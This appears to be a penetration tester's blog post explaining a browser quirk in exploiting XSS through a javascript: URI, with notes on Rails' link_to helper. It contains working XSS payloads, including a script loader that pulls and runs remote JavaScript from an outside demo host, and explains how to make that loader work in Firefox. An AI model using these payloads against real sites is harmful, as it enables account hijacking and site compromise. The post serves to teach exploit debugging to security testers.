An odd quirk with XSS through JavaScript URI

Fri 14th June 19

I was recently contacted by Ryan Dewhurst to help him with an XSS issue he was having problems with. Ryan knows his stuff, and if he was having problems with something, I knew it had to be a fun challenge.

He could inject content into a JavaScript URI and was trying to find a way to fully exploit it. The injection looked like this:

<a href="javascript: <INJECT HERE>">Click Me</a>

XSS could easily be proved by injecting an alert which triggered when the link was clicked:

<a href="javascript: alert(1)">Click Me</a>

But when he tried to inject the following fairly standard code to add a new script tag to the DOM, he came across some issues.

var s = document.createElement('script');
s.type = 'text/javascript';
s.src = 'https://vuln-demo.com/jsquirk/xss.js';
document.head.appendChild(s);

The code worked fine on his test site (you all test your exploits locally before dropping them on a client site, right?): the external JS file was loaded and the code ran successfully. But when it was dropped into the client environment, rather than loading the external file, the page refreshed and showed the following content:

[object HTMLScriptElement]

I didn’t have access to the client site, but I was able to confirm that the sample code worked correctly for me, and we both sat and scratched our heads. I was in the middle of writing a report, so the test I’d done was in Chrome, which I use as my main browser. To help with debugging, I brought up my testing environment of Firefox, Burp and a few other bits, then tried again with the test code. At this point the test code failed, and I got the same response Ryan was getting from the client site. I asked Ryan what browser he was using: Firefox to access the client but, same as me, he had looked at the sample code in Chrome. When he tried running the exploit against the client site in Chrome, it worked as expected; the JS was loaded and ran fine.

After a bit of debugging, we found that by adding an alert or a console.log onto the end of the exploit code, it could be made to work in both Firefox and Chrome:

var s = document.createElement('script');
s.type = 'text/javascript';
s.src = 'https://vuln-demo.com/jsquirk/xss.js';
document.head.appendChild(s);
console.log("");

After some reading around, I found that if you are using an onclick event on a link and want to disable the link itself, you can use javascript: void(0) as a way to kill it. Swapping that in for the log command in this example worked, and it had the additional benefit of not writing anything extra to the console.
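For reference, the complete payload in the original injection context would then look something like this. This is only a sketch reusing the demo URL from above, with void(0) as the final statement so the completion value is undefined:

```html
<a href="javascript: var s = document.createElement('script'); s.type = 'text/javascript'; s.src = 'https://vuln-demo.com/jsquirk/xss.js'; document.head.appendChild(s); void(0)">Click Me</a>
```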

Based on the brief reading I did on the topic, the browser's reaction should be based on what is returned by the last command run. void(0), console.log("") and alert(1) all return undefined, which tells the browser not to react to the link; document.head.appendChild() returns the element which was added to the DOM, which is not undefined. Based on this, I'd guess that Firefox is behaving correctly in processing the href after the JavaScript has been executed, while Chrome is being nice and assuming that, as you ran some JavaScript, you probably won't then want to follow the link.

Out of curiosity, I also tried the test code in Edge and IE. I initially got some mixed results, with both showing signs of working with and without the trailing command, but after clearing caches and starting from a clean slate, both appear to work in the same way as Firefox and require the trailing command.

If you want to check this out, I’ve set up two demonstrations on JSFiddle:

Before anyone jumps in shouting "I’d have exploited it a different way" or "This way is better…": when this failed, both Ryan and I wanted to know why. Yes, there are lots of other ways this could have been exploited, but learning why something is failing is really useful, and practising debugging things like this when they come up helps improve those core skills.

An additional note from Ryan: he says this is a common issue in Rails apps. As Rails output-encodes most content by default, developers don’t think that JavaScript (and "data") URIs are a problem, but this is one of the few places Rails does not auto-encode, so any unvalidated input passed to the "link_to" helper is vulnerable to "javascript" and "data" URI XSS.
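To sketch that Rails case: link_to is the real helper, but the variable name below is made up for illustration. If a template contains something like link_to "Website", user_supplied_url and the value comes straight from user input, Rails renders the href without encoding or validating it as a URL, so the output would look something like:

```html
<!-- Hypothetical rendered output when user_supplied_url is "javascript:alert(1)" -->
<a href="javascript:alert(1)">Website</a>
```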

Conclusion

As well as pointing out this specific quirk, I want this post to highlight the different behaviours between browsers, all of which are supposed to implement the same standard. If you are developing a proof of concept, make sure you test it out in as many different environments as possible and comment on the findings in your report. You don’t want to spend ages putting together an amazing demo of an exploit only to find that while it worked perfectly for you in Chrome, it didn’t work for the client when they looked at it in Edge.

Similarly, you might feel that a vulnerability deserves its risk level changing if browser support is not universal; a vulnerability which can only be exploited in Firefox may not be a serious risk to a client who has enforced rules on staff only using IE.

Finally, if something doesn’t work for you the first time, or doesn’t work quite as you would expect, look into why if you have the time. Spend some time debugging it and trying to understand the problem, as those few minutes spent today may save you hours on a future test.
